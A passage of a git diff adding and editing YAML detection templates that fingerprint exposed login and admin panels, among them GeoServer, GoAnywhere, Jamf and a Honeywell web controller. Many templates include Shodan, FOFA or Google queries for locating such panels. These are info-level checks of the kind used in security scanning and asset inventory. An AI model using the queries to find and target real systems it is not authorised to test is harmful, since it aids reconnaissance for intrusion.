 
 requests:
   - method: GET
diff --git a/exposed-panels/flip-cms-panel.yaml b/exposed-panels/flip-cms-panel.yaml
new file mode 100644
index 0000000000..8e825b0a89
--- /dev/null
+++ b/exposed-panels/flip-cms-panel.yaml
@@ -0,0 +1,38 @@
+id: flip-cms-panel
+
+info:
+  name: Flip CMS Login Panel
+  author: idealphase
+  severity: info
+  description: |
+    We are a web agency in the province of Ancona (Falconara Marittima) and we deal with the creation of websites and digital projects. In our studio we create websites , we take care of the creation of e-commerce.
+  reference:
+    - https://www.fliplab.it/
+  metadata:
+    verified: true
+  tags: panel,flip,cms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Flip CMS</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<span class="copy">Copyright © 2022 • v\.(.+) • <a href="https:\/\/www.fliplab.it" target="_blank">'
diff --git a/exposed-panels/froxlor-management-panel.yaml b/exposed-panels/froxlor-management-panel.yaml
new file mode 100644
index 0000000000..f30021aeb8
--- /dev/null
+++ b/exposed-panels/froxlor-management-panel.yaml
@@ -0,0 +1,31 @@
+id: froxlor-management-panel
+
+info:
+  name: Froxlor Server Management Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Froxlor Server Management Panel"
+  tags: panel,froxlor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>Froxlor Server Management Panel</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ftm-manager-panel.yaml b/exposed-panels/ftm-manager-panel.yaml
new file mode 100644
index 0000000000..2a0f1671fe
--- /dev/null
+++ b/exposed-panels/ftm-manager-panel.yaml
@@ -0,0 +1,30 @@
+id: ftm-manager-panel
+
+info:
+  name: FTM Manager Panel
+  author: idealphase
+  severity: info
+  description: FTM Manager Industry LTE Router.
+  metadata:
+    verified: true
+    shodan-query: http.html:"FTM manager"
+    google-query: intitle:"FTM manager"
+  tags: panel,ftm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'FTM Manager'
+          - 'login-panel'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/fuji-xerox-printer-detect.yaml b/exposed-panels/fuji-xerox-printer-detect.yaml
new file mode 100644
index 0000000000..79f20f058b
--- /dev/null
+++ b/exposed-panels/fuji-xerox-printer-detect.yaml
@@ -0,0 +1,25 @@
+id: fuji-xerox-printer-detect
+
+info:
+  name: Fuji xerox - Printer Detect
+  author: gy741
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Fuji Xerox Co., Ltd"
+  tags: iot,panel,fuji,printer
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hdstat.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Fuji Xerox Co., Ltd"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/gargoyle-router.yaml b/exposed-panels/gargoyle-router.yaml
new file mode 100644
index 0000000000..0187b5b309
--- /dev/null
+++ b/exposed-panels/gargoyle-router.yaml
@@ -0,0 +1,32 @@
+id: gargoyle-router
+
+info:
+  name: Gargoyle Router Management Utility
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/8004
+  metadata:
+    verified: true
+    shodan-query: title:"Gargoyle Router Management Utility"
+  tags: panel,iot,gargoyle,router,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Gargoyle Router Management Utility</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/geoserver-login-panel.yaml b/exposed-panels/geoserver-login-panel.yaml
new file mode 100644
index 0000000000..b32e0c8560
--- /dev/null
+++ b/exposed-panels/geoserver-login-panel.yaml
@@ -0,0 +1,37 @@
+id: geoserver-login-panel
+
+info:
+  name: GeoServer Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"GeoServer"
+  tags: panel,geoserver
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/web"
+      - "{{BaseURL}}/geoserver/web/"
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>GeoServer: Welcome</title>"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<span>GeoServer ([0-9.]+)'
diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml
index f94c37ee42..96d6634fba 100644
--- a/exposed-panels/glpi-authentication.yaml
+++ b/exposed-panels/glpi-authentication.yaml
@@ -4,8 +4,8 @@ info:
   name: GLPI - Authentication
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentication%22
+  metadata:
+    shodan-query: http.title:"GLPI - Authentication"
   tags: panel,auth,glpi
 
 requests:
diff --git a/exposed-panels/glpi-login.yaml b/exposed-panels/glpi-login.yaml
index 8476d66264..cb40221ea0 100644
--- a/exposed-panels/glpi-login.yaml
+++ b/exposed-panels/glpi-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7002
-  tags: panel,glpi
+  tags: panel,glpi,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/goanywhere-mft-login.yaml b/exposed-panels/goanywhere-mft-login.yaml
new file mode 100644
index 0000000000..b39c9e2171
--- /dev/null
+++ b/exposed-panels/goanywhere-mft-login.yaml
@@ -0,0 +1,27 @@
+id: goanywhere-mft-login
+
+info:
+  name: GoAnywhere Managed File Transfer Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"GoAnywhere Managed File Transfer"
+  tags: panel,goanywhere,login,filetransfer
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/goanywhere/auth/Login.xhtml"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "GoAnywhere Managed File Transfer"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/grafana-detect.yaml b/exposed-panels/grafana-detect.yaml
index 2f65955bc5..59fb403f4f 100644
--- a/exposed-panels/grafana-detect.yaml
+++ b/exposed-panels/grafana-detect.yaml
@@ -4,6 +4,8 @@ info:
   name: Grafana panel detect
   author: organiccrap
   severity: info
+  metadata:
+    shodan-query: title:"Grafana"
   tags: panel,grafana
 
 requests:
diff --git a/exposed-panels/gryphon-login.yaml b/exposed-panels/gryphon-login.yaml
new file mode 100644
index 0000000000..0ca111fb77
--- /dev/null
+++ b/exposed-panels/gryphon-login.yaml
@@ -0,0 +1,24 @@
+id: gryphon-login
+
+info:
+  name: Gryphon Panel
+  author: pdteam
+  severity: info
+  reference:
+    - https://gryphonconnect.com/software-release-updates/
+  metadata:
+    shodan-query: http.title:"Gryphon"
+  tags: gryphon,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/luci/"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Gryphon'
+          - 'Welcome to GryphonCare'
+        condition: or
\ No newline at end of file
diff --git a/exposed-panels/h2console-panel.yaml b/exposed-panels/h2console-panel.yaml
index b7659b3a6f..ecd30898ef 100644
--- a/exposed-panels/h2console-panel.yaml
+++ b/exposed-panels/h2console-panel.yaml
@@ -7,7 +7,8 @@ info:
   reference:
     - https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ
     - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console
-    - https://www.shodan.io/search?query=http.title%3A%22H2+Console%22
+  metadata:
+    shodan-query: http.title:"H2 Console"
   tags: panel,h2,console
 
 requests:
diff --git a/exposed-panels/highmail-admin-panel.yaml b/exposed-panels/highmail-admin-panel.yaml
new file mode 100644
index 0000000000..420a364975
--- /dev/null
+++ b/exposed-panels/highmail-admin-panel.yaml
@@ -0,0 +1,31 @@
+id: highmail-admin-panel
+
+info:
+  name: HighMail Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"HighMail"
+    fofa-query: title="HighMail"
+  tags: highmail,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/login"
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "HighMail"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/hitron-technologies.yaml b/exposed-panels/hitron-technologies.yaml
index dee433b5b9..f2a612b392 100644
--- a/exposed-panels/hitron-technologies.yaml
+++ b/exposed-panels/hitron-technologies.yaml
@@ -1,25 +1,25 @@
-id: hitron-technologies-detect
+id: hitron-technologies-detect
 
-info:
-  name: Hitron Technologies
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7062
-  tags: router,panel
+info:
+  name: Hitron Technologies
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7062
+  tags: router,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "hitron"
-          - "$.hitron.languages.lang_init();"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hitron"
+          - "$.hitron.languages.lang_init();"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml
index 6ceea803db..634a2b1c16 100644
--- a/exposed-panels/honeywell-web-controller.yaml
+++ b/exposed-panels/honeywell-web-controller.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7130
-  tags: panel
+  tags: edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/honeywell-xl-web-controller.yaml b/exposed-panels/honeywell-xl-web-controller.yaml
new file mode 100644
index 0000000000..cabda9f52c
--- /dev/null
+++ b/exposed-panels/honeywell-xl-web-controller.yaml
@@ -0,0 +1,30 @@
+id: honeywell-xl-web-controller
+
+info:
+  name: Honeywell XL Web Controller
+  author: DhiyaneshDK
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/7130
+  classification:
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    shodan-dork: title:"Honeywell XL Web Controller"
+  tags: panel,honeywell,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/standard/default.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Honeywell XL Web Controller</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/horde-login-panel.yaml b/exposed-panels/horde-login-panel.yaml
new file mode 100644
index 0000000000..57916286ba
--- /dev/null
+++ b/exposed-panels/horde-login-panel.yaml
@@ -0,0 +1,28 @@
+id: horde-login-panel
+
+info:
+  name: Horde Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-741491222
+  tags: horde,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/horde/login.php"
+      - "{{BaseURL}}/login.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "HordeLogin.user"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/horde-webmail-login.yaml b/exposed-panels/horde-webmail-login.yaml
new file mode 100644
index 0000000000..34d4086379
--- /dev/null
+++ b/exposed-panels/horde-webmail-login.yaml
@@ -0,0 +1,28 @@
+id: horde-webmail-login
+
+info:
+  name: Horde WebMail Login
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:2104916232
+  tags: horde,webmail,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/horde/imp/login.php"
+      - "{{BaseURL}}/imp/login.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Welcome to Horde"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/hp-service-manager.yaml b/exposed-panels/hp-service-manager.yaml
index b8804072bf..d4450e4ee9 100644
--- a/exposed-panels/hp-service-manager.yaml
+++ b/exposed-panels/hp-service-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: HP Service Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22
+  metadata:
+    shodan-query: http.title:"HP Service Manager"
   tags: panel,hp,service
 
 requests:
diff --git a/exposed-panels/hpe-system-management-login.yaml b/exposed-panels/hpe-system-management-login.yaml
index 1041aff623..2d004eb29d 100644
--- a/exposed-panels/hpe-system-management-login.yaml
+++ b/exposed-panels/hpe-system-management-login.yaml
@@ -1,27 +1,27 @@
-id: hpe-system-management-login
+id: hpe-system-management-login
 
-info:
-  name: HPE System Management Login
-  author: divya_mudgal
-  severity: info
-  tags: hpe,tech,panel
+info:
+  name: HPE System Management Login
+  author: divya_mudgal
+  severity: info
+  tags: hpe,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/cpqlogin.htm"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: and
-        part: body
-        words:
-          - "HPE System Management Homepage"
-          - "/proxy/ssllogin"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "HPE System Management Homepage v([0-9-.]*)"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cpqlogin.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        part: body
+        words:
+          - "HPE System Management Homepage"
+          - "/proxy/ssllogin"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "HPE System Management Homepage v([0-9-.]*)"
diff --git a/exposed-panels/hybris-administration-console.yaml b/exposed-panels/hybris-administration-console.yaml
new file mode 100644
index 0000000000..86c9e84bd5
--- /dev/null
+++ b/exposed-panels/hybris-administration-console.yaml
@@ -0,0 +1,29 @@
+id: hybris-administration-console
+
+info:
+  name: Hybris administration console
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Hybris"
+  tags: panel,hybris
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "hybris administration console"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ibm/ibm-maximo-login.yaml b/exposed-panels/ibm/ibm-maximo-login.yaml
new file mode 100644
index 0000000000..a46d6e74f7
--- /dev/null
+++ b/exposed-panels/ibm/ibm-maximo-login.yaml
@@ -0,0 +1,32 @@
+id: ibm-maximo-login
+
+info:
+  name: IBM Maximo Login Panel
+  author: ritikchaddha
+  severity: info
+  reference:
+    - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-399298961
+  tags: maximo,panel,ibm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/maximo/webclient/login/login.jsp"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "maximo-icon.png"
+          - "IBM"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ibm/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml
index 1762931023..e3beb70bb4 100644
--- a/exposed-panels/ibm/ibm-note-login.yaml
+++ b/exposed-panels/ibm/ibm-note-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/7122
-  tags: panel,ibm
+  tags: ibm,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/exposed-panels/ibm/ibm-websphere-admin-panel.yaml
new file mode 100644
index 0000000000..61a0118c2c
--- /dev/null
+++ b/exposed-panels/ibm/ibm-websphere-admin-panel.yaml
@@ -0,0 +1,32 @@
+id: ibm-websphere-admin-panel
+
+info:
+  name: WebSphere Application Server Community Edition Admin Panel
+  author: ritikchaddha
+  severity: info
+  reference:
+    - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:1337147129
+  tags: websphere,panel,ibm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/console"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Administrative Console Login"
+          - "Log in to the Administrative Console"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/ibm/ibm-websphere-panel.yaml b/exposed-panels/ibm/ibm-websphere-panel.yaml
index ac774b932f..14396bcc46 100644
--- a/exposed-panels/ibm/ibm-websphere-panel.yaml
+++ b/exposed-panels/ibm/ibm-websphere-panel.yaml
@@ -4,6 +4,8 @@ info:
   name: IBM WebSphere Panel
   author: pdteam
   severity: info
+  metadata:
+    shodan-query: http.html:"IBM WebSphere Portal"
   tags: ibm,websphere,panel
 
 requests:
diff --git a/exposed-panels/icc-pro-login.yaml b/exposed-panels/icc-pro-login.yaml
new file mode 100644
index 0000000000..a80fbe5ce8
--- /dev/null
+++ b/exposed-panels/icc-pro-login.yaml
@@ -0,0 +1,33 @@
+id: icc-pro-login
+
+info:
+  name: ICC Pro System Login
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/7980
+  metadata:
+    verified: true
+    shodan-query: title:"Login to ICC PRO system"
+  tags: panel,icc-pro,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Account/Login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Login to ICC PRO system</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/icewarp-panel-detect.yaml b/exposed-panels/icewarp-panel-detect.yaml
new file mode 100644
index 0000000000..7de9011d0e
--- /dev/null
+++ b/exposed-panels/icewarp-panel-detect.yaml
@@ -0,0 +1,34 @@
+id: icewarp-panel-detect
+
+info:
+  name: IceWarp Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"icewarp"
+  tags: icewarp,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webmail/"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: header
+        words:
+          - 'IceWarp'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - 'Server: (.{4,20})'
diff --git a/exposed-panels/icinga-web-login.yaml b/exposed-panels/icinga-web-login.yaml
index b0383b79b2..5602ac406b 100644
--- a/exposed-panels/icinga-web-login.yaml
+++ b/exposed-panels/icinga-web-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Icinga Web 2 Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
+  metadata:
+    shodan-query: http.title:"Icinga Web 2 Login"
   tags: panel,icinga
 
 requests:
diff --git a/exposed-panels/ictprotege-login-panel.yaml b/exposed-panels/ictprotege-login-panel.yaml
new file mode 100644
index 0000000000..59d95e3416
--- /dev/null
+++ b/exposed-panels/ictprotege-login-panel.yaml
@@ -0,0 +1,26 @@
+id: ictprotege-login-panel
+
+info:
+  name: ICT Protege WX Login Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"ICT Protege WX&reg;"
+  tags: panel,ictprotege
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>ICT Protege WX&reg;</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml
index f593cd3586..d3e217f6e5 100644
--- a/exposed-panels/identity-services-engine.yaml
+++ b/exposed-panels/identity-services-engine.yaml
@@ -4,8 +4,8 @@ info:
   name: Identity Services Engine
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
+  metadata:
+    shodan-query: http.title:"Identity Services Engine"
   tags: panel
 
 requests:
diff --git a/exposed-panels/ilch-admin-panel.yaml b/exposed-panels/ilch-admin-panel.yaml
new file mode 100644
index 0000000000..264b68a22d
--- /dev/null
+++ b/exposed-panels/ilch-admin-panel.yaml
@@ -0,0 +1,26 @@
+id: ilch-admin-panel
+
+info:
+  name: Ilch CMS Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Ilch"
+  tags: panel,ilch,cms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/admin/admin/login/index/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ilch_token'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml
index 97b3cc1200..1f2a3a5bd4 100644
--- a/exposed-panels/intelbras-login.yaml
+++ b/exposed-panels/intelbras-login.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7272
   metadata:
     shodan-query: http.title:"Intelbras"
-    google-dork: intitle:"Intelbras" "All Rights Reserved" -.com
-  tags: panel
+    google-query: intitle:"Intelbras" "All Rights Reserved" -.com
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/intelbras-panel.yaml b/exposed-panels/intelbras-panel.yaml
new file mode 100644
index 0000000000..5595252f8b
--- /dev/null
+++ b/exposed-panels/intelbras-panel.yaml
@@ -0,0 +1,31 @@
+id: intelbras-panel
+
+info:
+  name: Intelbras Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Intelbras"
+    fofa-query: app="Intelbras"
+  tags: panel,intelbras
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        words:
+          - "<title>Intelbras"
+        case-insensitive: true
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'id="product">([A-Za-z 0-9]+)<\/p>'
diff --git a/exposed-panels/ipdiva-mediation-panel.yaml b/exposed-panels/ipdiva-mediation-panel.yaml
new file mode 100644
index 0000000000..b2a89c368d
--- /dev/null
+++ b/exposed-panels/ipdiva-mediation-panel.yaml
@@ -0,0 +1,32 @@
+id: ipdiva-mediation-panel
+
+info:
+  name: IPdiva Mediation Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"IPdiva"
+  tags: panel,ipdiva,mediation
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/mediation/domains"
+      - "{{BaseURL}}/mediation/authenticate"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "IPdiva mediation"
+
+      - type: word
+        part: body
+        words:
+          - "IPdiva Secure"
diff --git a/exposed-panels/jamf-login.yaml b/exposed-panels/jamf-login.yaml
new file mode 100644
index 0000000000..0c29a70349
--- /dev/null
+++ b/exposed-panels/jamf-login.yaml
@@ -0,0 +1,27 @@
+id: jamf-login
+
+info:
+  name: Jamf Pro Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Jamf Pro"
+  tags: panel,jamf
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<title>Jamf Pro Login(.*)</title>'
+
+      - type: status
+        status:
+          - 401
diff --git a/exposed-panels/jamf-setup-assistant.yaml b/exposed-panels/jamf-setup-assistant.yaml
new file mode 100644
index 0000000000..ca663bdae7
--- /dev/null
+++ b/exposed-panels/jamf-setup-assistant.yaml
@@ -0,0 +1,25 @@
+id: jamf-setup-assistant
+
+info:
+  name: Jamf Pro Setup Assistant
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Jamf Pro Setup"
+  tags: jamf,setup,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/setupAssistant.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Jamf Pro Setup Assistant"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/jboss-juddi.yaml b/exposed-panels/jboss-juddi.yaml
new file mode 100644
index 0000000000..bab7c792b5
--- /dev/null
+++ b/exposed-panels/jboss-juddi.yaml
@@ -0,0 +1,37 @@
+id: jboss-juddi
+
+info:
+  name: JBoss WS JUDDI Console Panel
+  author: DhiyaneshDk
+  severity: low
+  description: |
+    The jUDDI (Java Universal Description, Discovery and Integration) Registry is a core component of the JBoss Enterprise SOA Platform. It is the product's default service registry and comes included as part of the product. In it are stored the addresses (end-point references) of all the services connected to the Enterprise Service Bus.It was implemented in JAXR and conforms to the UDDI specifications.
+  remediation: Restrict access to the service if not needed.
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossJuddi.java
+  metadata:
+    verified: true
+  tags: jboss,juddi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/juddi/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "JBoss JUDDI"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/jfrog.yaml b/exposed-panels/jfrog.yaml
index fd0f38b8e9..f0944bde78 100644
--- a/exposed-panels/jfrog.yaml
+++ b/exposed-panels/jfrog.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6797
-  tags: panel,jfrog
+  tags: panel,jfrog,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/jupyter-notebook.yaml b/exposed-panels/jupyter-notebook.yaml
new file mode 100644
index 0000000000..8cc35d62d5
--- /dev/null
+++ b/exposed-panels/jupyter-notebook.yaml
@@ -0,0 +1,39 @@
+id: jupyter-notebook
+
+info:
+  name: Jupyter Notebook
+  author: hakimkt,arafatansari
+  severity: info
+  description: |
+    JupyterHub is an open source tool that lets you host a distributed Jupyter Notebook environment.
+  reference:
+    - https://www.exploit-db.com/ghdb/7970
+  metadata:
+    shodan-query: http.html:"JupyterHub"
+  tags: edb,panel,jupyter,notebook,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jupyter/login"
+      - "{{BaseURL}}/jupyter/lab"
+      - "{{BaseURL}}/jupyter/hub/lti/launch"
+      - "{{BaseURL}}/hub/login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '/jupyter/static/base/images/logo.png'
+          - '/jupyter/hub/logo'
+          - 'Select items to perform actions on them.'
+          - 'JupyterHub'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/kafka-manager-panel.yaml b/exposed-panels/kafka-manager-panel.yaml
new file mode 100644
index 0000000000..abb02f43cf
--- /dev/null
+++ b/exposed-panels/kafka-manager-panel.yaml
@@ -0,0 +1,29 @@
+id: kafka-manager-panel
+
+info:
+  name: Kafka Manager Panel
+  author: Paper-Pen
+  severity: low
+  description: A kafka manager unauthorized access was discovered.
+  reference:
+    - https://github.com/yahoo/CMAK
+  metadata:
+    fofa-query: app="Kafka-Manager"
+  tags: tech,kafka
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Kafka Manager"
+
+      - type: word
+        part: header
+        words:
+          - "Kafka-Manager"
diff --git a/exposed-panels/kavita-panel-detect.yaml b/exposed-panels/kavita-panel-detect.yaml
new file mode 100644
index 0000000000..83a42fb467
--- /dev/null
+++ b/exposed-panels/kavita-panel-detect.yaml
@@ -0,0 +1,30 @@
+id: kavita-panel-detect
+
+info:
+  name: Kavita Panel Detect
+  author: ritikchaddha
+  severity: info
+  description: |
+    Kavita is a fast, feature rich, cross platform reading server. Built with a focus for manga, and the goal of being a full solution for all your reading needs.
+  reference:
+    - https://github.com/kareadita/kavita
+  metadata:
+    verified: true
+    shodan-query: http.title:"kavita"
+  tags: panel,kavita
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
